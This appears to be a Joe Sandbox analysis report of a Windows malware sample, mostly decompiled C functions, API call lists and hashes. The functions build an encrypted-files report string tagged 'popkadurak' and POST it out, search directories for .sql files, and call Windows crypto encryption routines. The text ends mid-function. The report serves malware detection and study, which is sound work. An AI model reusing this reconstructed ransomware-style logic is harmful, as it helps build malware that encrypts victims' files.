                                    0x0f5853f6
                                    0x0f5853fc
                                    0x0f585401
                                    0x0f58540c
                                    0x0f58540c
                                    0x0f585408
                                    0x0f585408
                                    0x0f585408
                                    0x0f58540e
                                    0x0f58541b
                                    0x0f585421
                                    0x0f585423
                                    0x0f5854dc
                                    0x00000000
                                    0x0f585429
                                    0x0f585429
                                    0x0f58542e
                                    0x0f585433
                                    0x0f585436
                                    0x0f58543a
                                    0x0f58543f
                                    0x0f585447
                                    0x0f5854e4
                                    0x0f5854e9
                                    0x0f5854ea
                                    0x0f5854eb
                                    0x0f5854ec
                                    0x0f5854ed
                                    0x0f5854ee
                                    0x0f5854ef
                                    0x0f5854f6
                                    0x0f5854f7
                                    0x0f5854f8
                                    0x0f5854fa
                                    0x0f5854fd
                                    0x0f585501
                                    0x0f585504
                                    0x0f58550f
                                    0x0f585525
                                    0x0f58552c
                                    0x0f585542
                                    0x0f585546
                                    0x0f585549
                                    0x0f58554b
                                    0x0f585558
                                    0x0f585558
                                    0x0f585558
                                    0x0f58554d
                                    0x0f58554d
                                    0x0f585550
                                    0x0f585552
                                    0x00000000
                                    0x0f585554
                                    0x0f585554
                                    0x0f585554
                                    0x0f585552
                                    0x0f58555e
                                    0x0f585564
                                    0x0f58556d
                                    0x0f585572
                                    0x0f58557a
                                    0x0f58557f
                                    0x0f585587
                                    0x0f58558c
                                    0x0f585594
                                    0x0f585599
                                    0x0f5855a1
                                    0x0f5855a6
                                    0x0f5855ae
                                    0x0f5855b3
                                    0x0f5855bc
                                    0x0f5855c5
                                    0x0f5855c9
                                    0x0f5855ca
                                    0x0f5855d2
                                    0x0f5855d7
                                    0x0f5855e1
                                    0x0f5855e2
                                    0x0f5855e3
                                    0x0f5855e9
                                    0x0f5855ee
                                    0x0f5855ef
                                    0x0f5855f4
                                    0x0f5855f6
                                    0x0f5855f8
                                    0x0f5855fc
                                    0x0f585601
                                    0x0f585609
                                    0x0f585610
                                    0x0f585615
                                    0x0f585617
                                    0x0f585627
                                    0x0f585627
                                    0x0f585619
                                    0x0f585619
                                    0x0f58561c
                                    0x0f58561e
                                    0x0f585623
                                    0x0f585623
                                    0x0f58561e
                                    0x0f585617
                                    0x0f585601
                                    0x0f585637
                                    0x0f585643
                                    0x0f58564d
                                    0x0f58564f
                                    0x0f585652
                                    0x0f585654
                                    0x0f585657
                                    0x0f585657
                                    0x0f585665
                                    0x0f58544d
                                    0x0f58544d
                                    0x0f585452
                                    0x0f585459
                                    0x0f58545c
                                    0x0f58545f
                                    0x0f585466
                                    0x0f58546d
                                    0x0f585481
                                    0x0f58548a
                                    0x0f58548e
                                    0x0f585492
                                    0x0f585492
                                    0x0f58548e
                                    0x0f58549e
                                    0x0f5854a5
                                    0x0f5854ad
                                    0x0f5854af
                                    0x0f5854af
                                    0x0f5854b6
                                    0x0f5854be
                                    0x0f5854be
                                    0x0f5854c0
                                    0x0f5854c3
                                    0x0f5854cd
                                    0x0f5854db
                                    0x0f5854db
                                    0x0f585447

                                    APIs
                                    • lstrlenA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,0F585615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F5853DF
                                    • VirtualAlloc.KERNEL32(00000000,00000002,00003000,00000040,?,?,?,?,0F585615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F5853F6
                                    • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0F58541B
                                    • lstrlenA.KERNEL32(?,00003000,00000004,00000000,?,?,?,?,0F585615,00000000,popkadurak), ref: 0F585477
                                    • VirtualAlloc.KERNEL32(00000000,00000001,?,?,?,?,0F585615,00000000,popkadurak), ref: 0F585481
                                    • lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0F585615,00000000,popkadurak), ref: 0F585492
                                    • HeapFree.KERNEL32(00000000,?,?,?,?,0F585615,00000000,popkadurak), ref: 0F5854AD
                                    • HeapFree.KERNEL32(00000000,?,?,?,?,0F585615,00000000,popkadurak), ref: 0F5854BE
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,0F585615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F5854CD
                                    • GetLastError.KERNEL32(?,?,?,?,0F585615,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F5854DC
                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,77296980), ref: 0F585512
                                    • VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0F585532
                                    • VirtualAlloc.KERNEL32(00000000,00032001,00003000,00000040), ref: 0F585544
                                    • lstrcatA.KERNEL32(00000000,?), ref: 0F58555E
                                    • lstrlenA.KERNEL32(00000000), ref: 0F5855B3
                                    • lstrlenW.KERNEL32(?), ref: 0F5855BF
                                    • lstrlenA.KERNEL32(00000000,00000000,00031FFF,?,00000000), ref: 0F5855DB
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0F585637
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000), ref: 0F585643
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000), ref: 0F58564D
                                    • InternetCloseHandle.WININET(0F58581B), ref: 0F585657
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Virtual$Freelstrlen$Alloc$Heap$BinaryCloseCryptErrorHandleInternetLastStringlstrcatlstrcpy
                                    • String ID: POST$popkadurak
                                    • API String ID: 1287001821-2707760125
                                    • Opcode ID: 82d7044d987e16b7e0132eb279490efcf1250d39303665e176c79883dbb2256d
                                    • Instruction ID: 07cc2bf360f6f6a29bb15e7d02c1104266da83b48d801c3e1682e08f9cf90ea1
                                    • Opcode Fuzzy Hash: 82d7044d987e16b7e0132eb279490efcf1250d39303665e176c79883dbb2256d
                                    • Instruction Fuzzy Hash: 7371B371E00309BBDB10ABA5DD45FAEBF78FF88722F144125EA04B7241EB789546CB50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 54%
                                    			E0F585670(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                    				signed int _v8;
                                    				void* _v12;
                                    				int _v16;
                                    				void* _v20;
                                    				char _v164;
                                    				void* __esi;
                                    				BYTE* _t33;
                                    				int _t41;
                                    				CHAR* _t44;
                                    				int _t52;
                                    				void* _t53;
                                    				char _t60;
                                    				BYTE* _t65;
                                    				char* _t69;
                                    				signed int _t70;
                                    				void* _t75;
                                    				signed int _t78;
                                    				CHAR* _t85;
                                    				int _t87;
                                    				long _t88;
                                    				void* _t89;
                                    				void* _t91;
                                    				void* _t94;
                                    
                                    				_t82 = __edx;
                                    				_t70 = __ecx;
                                    				_v12 = __edx;
                                    				_v8 = __ecx;
                                    				_t33 = VirtualAlloc(0, 0x4c02, 0x3000, 0x40);
                                    				_v20 = _t33;
                                    				if(_t33 == 0) {
                                    					_t65 = 0;
                                    					_t85 = 0;
                                    				} else {
                                    					_t4 =  &(_t33[0x800]); // 0x800
                                    					_t85 = _t4;
                                    					_t65 = _t33;
                                    				}
                                    				_push(_v12);
                                    				wsprintfW(_t65, L"action=result&e_files=%d&e_size=%I64u&e_time=%d&", _v8, _a4, _a8);
                                    				_push(0);
                                    				_push(_t70);
                                    				_push(0);
                                    				_push(0);
                                    				_push(_t70);
                                    				_push(0);
                                    				_push(_t70);
                                    				_push(0);
                                    				_push(_t70);
                                    				_push(0);
                                    				_push(_t70);
                                    				_push(0);
                                    				_t94 = _t91 + 0x14;
                                    				_push(0);
                                    				_push(_t70);
                                    				_push(0);
                                    				E0F583BC0( &_v164);
                                    				E0F587490( &_v164, _t82);
                                    				E0F5872A0( &_v164);
                                    				E0F5870A0( &_v164, _t65 + lstrlenW(_t65) * 2);
                                    				_t41 = lstrlenW(_t65);
                                    				_t75 =  *0xf592a78; // 0x0
                                    				_v8 = _t41;
                                    				if(_t75 != 0) {
                                    					VirtualFree(_t75, 0, 0x8000);
                                    				}
                                    				_t44 = VirtualAlloc(0, lstrlenW(L"popkadurak") + 2, 0x3000, 4);
                                    				 *0xf592a78 = _t44;
                                    				if(_t44 != 0) {
                                    					wsprintfA(_t44, "%S", L"popkadurak");
                                    					_t94 = _t94 + 0xc;
                                    				}
                                    				_t87 = _v8 + _v8;
                                    				E0F585F00(_t65, _t87, _t87);
                                    				_v16 = _v8 * 8;
                                    				if(CryptBinaryToStringA(_t65, _t87, 0x40000001, _t85,  &_v16) == 0) {
                                    					GetLastError();
                                    				}
                                    				_t22 = lstrlenA(_t85) + 4; // 0x4
                                    				_t88 = _t22;
                                    				_v12 = VirtualAlloc(0, _t88, 0x3000, 0x40);
                                    				_t52 = lstrlenA(_t85);
                                    				_t78 = _v12;
                                    				_t53 = _t52 + 2;
                                    				if(_t78 == 0) {
                                    					L11:
                                    					_v8 = 0;
                                    				} else {
                                    					_v8 = _t78;
                                    					if(_t53 >= _t88) {
                                    						goto L11;
                                    					}
                                    				}
                                    				_t89 = 0;
                                    				if(lstrlenA(_t85) != 0) {
                                    					_t69 = _v8;
                                    					do {
                                    						_t60 =  *((intOrPtr*)(_t89 + _t85));
                                    						if(_t60 != 0xa && _t60 != 0xd) {
                                    							 *_t69 = _t60;
                                    							_t69 = _t69 + 1;
                                    						}
                                    						_t89 = _t89 + 1;
                                    					} while (_t89 < lstrlenA(_t85));
                                    				}
                                    				E0F5854F0(_v8, 0, _t78, 0);
                                    				_t68 =  !=  ? 1 : 0;
                                    				VirtualFree(_v12, 0, 0x8000);
                                    				E0F587D70( &_v164);
                                    				VirtualFree(_v20, 0, 0x8000);
                                    				_t59 =  !=  ? 1 : 0;
                                    				return  !=  ? 1 : 0;
                                    			}


























                                    0x0f585670
                                    0x0f585670
                                    0x0f585690
                                    0x0f585693
                                    0x0f585696
                                    0x0f585698
                                    0x0f58569d
                                    0x0f5856a9
                                    0x0f5856ab
                                    0x0f58569f
                                    0x0f58569f
                                    0x0f58569f
                                    0x0f5856a5
                                    0x0f5856a5
                                    0x0f5856ad
                                    0x0f5856bf
                                    0x0f5856c8
                                    0x0f5856ca
                                    0x0f5856cb
                                    0x0f5856d0
                                    0x0f5856d2
                                    0x0f5856d3
                                    0x0f5856d5
                                    0x0f5856d6
                                    0x0f5856d8
                                    0x0f5856d9
                                    0x0f5856db
                                    0x0f5856dc
                                    0x0f5856de
                                    0x0f5856e1
                                    0x0f5856e3
                                    0x0f5856e4
                                    0x0f5856ec
                                    0x0f5856f7
                                    0x0f585702
                                    0x0f585718
                                    0x0f58571e
                                    0x0f585724
                                    0x0f58572a
                                    0x0f58572f
                                    0x0f585739
                                    0x0f585739
                                    0x0f585757
                                    0x0f585759
                                    0x0f585760
                                    0x0f58576d
                                    0x0f585773
                                    0x0f585773
                                    0x0f58577b
                                    0x0f585780
                                    0x0f58578f
                                    0x0f5857a6
                                    0x0f5857a8
                                    0x0f5857a8
                                    0x0f5857be
                                    0x0f5857be
                                    0x0f5857cb
                                    0x0f5857ce
                                    0x0f5857d0
                                    0x0f5857d3
                                    0x0f5857d8
                                    0x0f5857e1
                                    0x0f5857e1
                                    0x0f5857da
                                    0x0f5857da
                                    0x0f5857df
                                    0x00000000
                                    0x00000000
                                    0x0f5857df
                                    0x0f5857e9
                                    0x0f5857ef
                                    0x0f5857f1
                                    0x0f5857f4
                                    0x0f5857f4
                                    0x0f5857f9
                                    0x0f5857ff
                                    0x0f585801
                                    0x0f585801
                                    0x0f585803
                                    0x0f58580a
                                    0x0f5857f4
                                    0x0f585816
                                    0x0f585830
                                    0x0f58583d
                                    0x0f585845
                                    0x0f585854
                                    0x0f585858
                                    0x0f58585e

                                    APIs
                                    • VirtualAlloc.KERNEL32(00000000,00004C02,00003000,00000040,?,00000000,?), ref: 0F585696
                                    • wsprintfW.USER32 ref: 0F5856BF
                                    • lstrlenW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 0F585708
                                    • lstrlenW.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000), ref: 0F58571E
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,00000000,?,00000000), ref: 0F585739
                                    • lstrlenW.KERNEL32(popkadurak,00003000,00000004,?,00000000,00000000,?,00000000), ref: 0F58574B
                                    • VirtualAlloc.KERNEL32(00000000,-00000002,?,00000000,00000000,?,00000000), ref: 0F585757
                                    • wsprintfA.USER32 ref: 0F58576D
                                    • CryptBinaryToStringA.CRYPT32(00000000,772966A0,40000001,00000000,?), ref: 0F58579E
                                    • GetLastError.KERNEL32(?,00000000,00000000,?,00000000), ref: 0F5857A8
                                    • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 0F5857B5
                                    • VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000040,?,00000000,00000000,?,00000000), ref: 0F5857C4
                                    • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 0F5857CE
                                    • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 0F5857EB
                                    • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000), ref: 0F585804
                                    • VirtualFree.KERNEL32(?,00000000,00008000,?,00000000,00000000,?,00000000), ref: 0F58583D
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,00000000,?,00000000), ref: 0F585854
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrlen$Virtual$AllocFree$wsprintf$BinaryCryptErrorLastString
                                    • String ID: action=result&e_files=%d&e_size=%I64u&e_time=%d&$popkadurak
                                    • API String ID: 823394411-2102589890
                                    • Opcode ID: ee2b5d6ee9c823bc20e4187a8128b48c11f7fdb013e8157bf36595c32abaae0a
                                    • Instruction ID: 248f84567f179666a6ba6c55420372e62117f4a21e51764751ad9fcf69e89744
                                    • Opcode Fuzzy Hash: ee2b5d6ee9c823bc20e4187a8128b48c11f7fdb013e8157bf36595c32abaae0a
                                    • Instruction Fuzzy Hash: 5A51D770B00305FFEB24AB64DD86F9E7B78FB44711F540065F601B6282EBB8AA16DB54
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E0F586BA0(WCHAR* __ecx) {
                                    				void* _v8;
                                    				void* _v12;
                                    				WCHAR* _v16;
                                    				WCHAR* _v20;
                                    				long _v24;
                                    				struct _WIN32_FIND_DATAW _v620;
                                    				int _t38;
                                    				struct _SECURITY_ATTRIBUTES* _t40;
                                    				int _t50;
                                    				WCHAR* _t52;
                                    				intOrPtr _t53;
                                    				void* _t54;
                                    				WCHAR* _t57;
                                    				long _t64;
                                    				WCHAR* _t66;
                                    				void* _t67;
                                    
                                    				_t66 = __ecx;
                                    				_v16 = __ecx;
                                    				_t52 =  &(_t66[lstrlenW(__ecx)]);
                                    				_v20 = _t52;
                                    				lstrcatW(_t66, "*");
                                    				_v8 = FindFirstFileW(_t66,  &_v620);
                                    				 *_t52 = 0;
                                    				_t53 = 0;
                                    				do {
                                    					if(lstrcmpW( &(_v620.cFileName), ".") == 0 || lstrcmpW( &(_v620.cFileName), L"..") == 0) {
                                    						goto L20;
                                    					} else {
                                    						lstrcatW(_t66,  &(_v620.cFileName));
                                    						_t38 = lstrlenW(_t66);
                                    						_t10 = _t38 - 1; // -1
                                    						_t57 =  &(_t66[_t10]);
                                    						if(_t38 == 0) {
                                    							L18:
                                    							_t53 = 0;
                                    							goto L19;
                                    						} else {
                                    							while( *_t57 != 0x2e) {
                                    								_t57 = _t57 - 2;
                                    								_t38 = _t38 - 1;
                                    								if(_t38 != 0) {
                                    									continue;
                                    								}
                                    								break;
                                    							}
                                    							if(_t38 == 0) {
                                    								goto L18;
                                    							} else {
                                    								_t40 = lstrcmpW(_t57, L".sql");
                                    								if(_t40 != 0) {
                                    									goto L18;
                                    								} else {
                                    									_t54 = CreateFileW(_t66, 0x80000000, 1, _t40, 3, _t40, _t40);
                                    									_t64 = GetFileSize(_t54, 0);
                                    									_v12 = 0;
                                    									if(_t64 < 0x40000000) {
                                    										_t67 = VirtualAlloc(0, _t64, 0x3000, 4);
                                    										if(_t67 != 0) {
                                    											if(ReadFile(_t54, _t67, _t64,  &_v24, 0) != 0 && E0F588260(_t67, "*******************") != 0) {
                                    												_t50 = lstrlenA("*******************");
                                    												_t15 = _t67 + 1; // 0x1
                                    												_v12 = E0F586B40(_t15 + _t50);
                                    											}
                                    											VirtualFree(_t67, 0, 0x8000);
                                    										}
                                    										_t66 = _v16;
                                    									}
                                    									CloseHandle(_t54);
                                    									_t53 = _v12;
                                    									if(_t53 == 0) {
                                    										L19:
                                    										 *_v20 = 0;
                                    										goto L20;
                                    									}
                                    								}
                                    							}
                                    						}
                                    					}
                                    					break;
                                    					L20:
                                    				} while (FindNextFileW(_v8,  &_v620) != 0);
                                    				FindClose(_v8);
                                    				return _t53;
                                    			}



















                                    0x0f586bab
                                    0x0f586baf
                                    0x0f586bbe
                                    0x0f586bc1
                                    0x0f586bc4
                                    0x0f586bde
                                    0x0f586be3
                                    0x0f586be6
                                    0x0f586bf0
                                    0x0f586c00
                                    0x00000000
                                    0x0f586c1c
                                    0x0f586c24
                                    0x0f586c2b
                                    0x0f586c31
                                    0x0f586c34
                                    0x0f586c39
                                    0x0f586d08
                                    0x0f586d08
                                    0x00000000
                                    0x0f586c40
                                    0x0f586c40
                                    0x0f586c46
                                    0x0f586c49
                                    0x0f586c4a
                                    0x00000000
                                    0x00000000
                                    0x00000000
                                    0x0f586c4a
                                    0x0f586c4e
                                    0x00000000
                                    0x0f586c54
                                    0x0f586c5a
                                    0x0f586c5e
                                    0x00000000
                                    0x0f586c64
                                    0x0f586c77
                                    0x0f586c82
                                    0x0f586c86
                                    0x0f586c8f
                                    0x0f586ca0
                                    0x0f586ca4
                                    0x0f586cb7
                                    0x0f586cce
                                    0x0f586cd4
                                    0x0f586cde
                                    0x0f586cde
                                    0x0f586ce9
                                    0x0f586ce9
                                    0x0f586cef
                                    0x0f586cef
                                    0x0f586cf3
                                    0x0f586cf9
                                    0x0f586cfe
                                    0x0f586d0a
                                    0x0f586d0f
                                    0x00000000
                                    0x0f586d0f
                                    0x0f586cfe
                                    0x0f586c5e
                                    0x0f586c4e
                                    0x0f586c39
                                    0x00000000
                                    0x0f586d12
                                    0x0f586d22
                                    0x0f586d2d
                                    0x0f586d3b

                                    APIs
                                    • lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0F586BB2
                                    • lstrcatW.KERNEL32(00000000,0F58FF44), ref: 0F586BC4
                                    • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0F586BD2
                                    • lstrcmpW.KERNEL32(?,0F58FF48,?,?), ref: 0F586BFC
                                    • lstrcmpW.KERNEL32(?,0F58FF4C,?,?), ref: 0F586C12
                                    • lstrcatW.KERNEL32(00000000,?), ref: 0F586C24
                                    • lstrlenW.KERNEL32(00000000,?,?), ref: 0F586C2B
                                    • lstrcmpW.KERNEL32(-00000001,.sql,?,?), ref: 0F586C5A
                                    • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 0F586C71
                                    • GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 0F586C7C
                                    • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?), ref: 0F586C9A
                                    • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 0F586CAF
                                    • lstrlenA.KERNEL32(*******************,?,?), ref: 0F586CCE
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0F586CE9
                                    • CloseHandle.KERNEL32(00000000,?,?), ref: 0F586CF3
                                    • FindNextFileW.KERNEL32(?,?,?,?), ref: 0F586D1C
                                    • FindClose.KERNEL32(?,?,?), ref: 0F586D2D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: File$Findlstrcmplstrlen$CloseVirtuallstrcat$AllocCreateFirstFreeHandleNextReadSize
                                    • String ID: *******************$.sql
                                    • API String ID: 3616287438-58436570
                                    • Opcode ID: 4316d48c5c50fba8f0a0de7206068e6975a8145e1a450562bb58f4688cd1bcf9
                                    • Instruction ID: 1599c5dc599c77c2f50f7025807eb1bc4c5c8c6536f040296bb1e9d9b3eb5869
                                    • Opcode Fuzzy Hash: 4316d48c5c50fba8f0a0de7206068e6975a8145e1a450562bb58f4688cd1bcf9
                                    • Instruction Fuzzy Hash: 67418F31601216BBDB10BB60DD48FAA7BACFF04711F505076E902F6241EB78AA17DB60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 75%
                                    			E0F588400(intOrPtr __ecx, intOrPtr __edx) {
                                    				long* _v8;
                                    				intOrPtr _v12;
                                    				intOrPtr _v16;
                                    				char _v20;
                                    				intOrPtr _v24;
                                    				intOrPtr _v28;
                                    				char _v32;
                                    				char _v34;
                                    				short _v36;
                                    				intOrPtr _v40;
                                    				intOrPtr _v44;
                                    				char _v48;
                                    				long** _t25;
                                    				struct HINSTANCE__* _t33;
                                    				_Unknown_base(*)()* _t34;
                                    				long _t40;
                                    				void* _t42;
                                    				void* _t46;
                                    				void* _t47;
                                    				void* _t48;
                                    
                                    				_t46 = 0;
                                    				_v16 = __ecx;
                                    				_t25 =  &_v8;
                                    				_v12 = __edx;
                                    				__imp__CryptAcquireContextW(_t25, 0, 0, 1, 0xf0000000);
                                    				if(_t25 == 0) {
                                    					L10:
                                    					return _t46;
                                    				} else {
                                    					_t42 = 0;
                                    					do {
                                    						_t4 = _t42 + 0x61; // 0x61
                                    						 *((char*)(_t48 + _t42 - 0x38)) = _t4;
                                    						_t42 = _t42 + 1;
                                    					} while (_t42 < 0x1a);
                                    					_t40 = __edx + 1;
                                    					_t47 = VirtualAlloc(0, _t40, 0x3000, 0x40);
                                    					if(_t47 == 0 || _v12 >= _t40) {
                                    						CryptReleaseContext(_v8, 0);
                                    						VirtualFree(_t47, 0, 0x8000);
                                    						return 0;
                                    					} else {
                                    						_v48 = 0x70797243;
                                    						_v44 = 0x6e654774;
                                    						_v40 = 0x646e6152;
                                    						_v36 = 0x6d6f;
                                    						_v34 = 0;
                                    						_v32 = 0x61766441;
                                    						_v28 = 0x32336970;
                                    						_v24 = 0x6c6c642e;
                                    						_v20 = 0;
                                    						_t33 = GetModuleHandleA( &_v32);
                                    						if(_t33 != 0) {
                                    							L7:
                                    							_t19 =  &_v48; // 0x70797243
                                    							_t34 = GetProcAddress(_t33, _t19);
                                    							if(_t34 != 0) {
                                    								 *_t34(_v8, _v12, _v16);
                                    								_t46 =  !=  ? 1 : _t46;
                                    							}
                                    						} else {
                                    							_t18 =  &_v32; // 0x61766441
                                    							_t33 = LoadLibraryA(_t18);
                                    							if(_t33 != 0) {
                                    								goto L7;
                                    							}
                                    						}
                                    						CryptReleaseContext(_v8, 0);
                                    						VirtualFree(_t47, 0, 0x8000);
                                    						goto L10;
                                    					}
                                    				}
                                    			}























                                    0x0f588410
                                    0x0f588412
                                    0x0f588417
                                    0x0f58841d
                                    0x0f588420
                                    0x0f588428
                                    0x0f5884f2
                                    0x0f5884fa
                                    0x0f58842e
                                    0x0f58842e
                                    0x0f588430
                                    0x0f588430
                                    0x0f588433
                                    0x0f588437
                                    0x0f588438
                                    0x0f588444
                                    0x0f58844e
                                    0x0f588452
                                    0x0f588500
                                    0x0f58850e
                                    0x0f58851c
                                    0x0f588461
                                    0x0f588464
                                    0x0f58846c
                                    0x0f588473
                                    0x0f58847a
                                    0x0f588480
                                    0x0f588484
                                    0x0f58848b
                                    0x0f588492
                                    0x0f588499
                                    0x0f58849d
                                    0x0f5884a5
                                    0x0f5884b5
                                    0x0f5884b5
                                    0x0f5884ba
                                    0x0f5884c2
                                    0x0f5884cd
                                    0x0f5884d6
                                    0x0f5884d6
                                    0x0f5884a7
                                    0x0f5884a7
                                    0x0f5884ab
                                    0x0f5884b3
                                    0x00000000
                                    0x00000000
                                    0x0f5884b3
                                    0x0f5884de
                                    0x0f5884ec
                                    0x00000000
                                    0x0f5884ec
                                    0x0f588452

                                    APIs
                                    • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0F588420
                                    • VirtualAlloc.KERNEL32(00000000,00000007,00003000,00000040), ref: 0F588448
                                    • GetModuleHandleA.KERNEL32(?), ref: 0F58849D
                                    • LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F5884AB
                                    • GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F5884BA
                                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F5884DE
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F5884EC
                                    • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,0F58292B), ref: 0F588500
                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,0F58292B), ref: 0F58850E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.327997550.000000000F581000.00000020.00000001.01000000.00000006.sdmp, Offset: 0F580000, based on PE: true
                                    • Associated: 0000000B.00000002.327992363.000000000F580000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328006726.000000000F58A000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328015412.000000000F592000.00000004.00000001.01000000.00000006.sdmpDownload File
                                    • Associated: 0000000B.00000002.328020862.000000000F594000.00000002.00000001.01000000.00000006.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_f580000_mqsmvj.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ContextCryptVirtual$FreeRelease$AcquireAddressAllocHandleLibraryLoadModuleProc
                                    • String ID: Advapi32.dll$CryptGenRandomAdvapi32.dll
                                    • API String ID: 3996966626-2152921537
                                    • Opcode ID: d9b6e0763ede1ddd0a44ef6609bd1a8659abff18e861ab10953714d84deecf6d
                                    • Instruction ID: c06f77bf9ffcd752874f0cfdc17745f53fecf6620f1a6133f364a53d8b8a4480
                                    • Opcode Fuzzy Hash: d9b6e0763ede1ddd0a44ef6609bd1a8659abff18e861ab10953714d84deecf6d
                                    • Instruction Fuzzy Hash: EE31E431A00208FFDB109FA5DD49BEEBF78FB04712F504069E601F2290D7789A169B65
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 50%
                                    			E0F586682(void* __eax, void* __edx) {
                                    				void* _t26;
                                    				int _t30;
                                    				intOrPtr _t31;
                                    				int _t33;
                                    				long _t36;
                                    				void* _t49;
                                    
                                    				_t26 = _t49 - 4;
                                    				__imp__CryptAcquireContextW(_t26, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1);
                                    				if(_t26 != 0) {
                                    					L6:
                                    					 *(_t49 - 0xc) = 0;
                                    					if(CryptImportKey( *(_t49 - 4),  *(_t49 + 8),  *(_t49 + 0xc), 0, 0, _t49 - 8) != 0) {
                                    						 *((intOrPtr*)(_t49 - 0x10)) = 0xa;
                                    						_t31 = _t49 - 0x10;
                                    						__imp__CryptGetKeyParam( *(_t49 - 8), 8, _t49 - 0x18, _t31, 0);
                                    						 *((intOrPtr*)(_t49 - 0x1c)) = _t31;
                                    						 *((intOrPtr*)( *((intOrPtr*)(_t49 + 0x14)))) = 0xc8;
                                    						_t33 =  *(_t49 + 0x10);
                                    						__imp__CryptEncrypt( *(_t49 - 8), 0, 1, 0, _t33,  *((intOrPtr*)(_t49 + 0x14)),  *((intOrPtr*)(_t49 + 0x18)));
                                    						 *(_t49 - 0xc) = _t33;
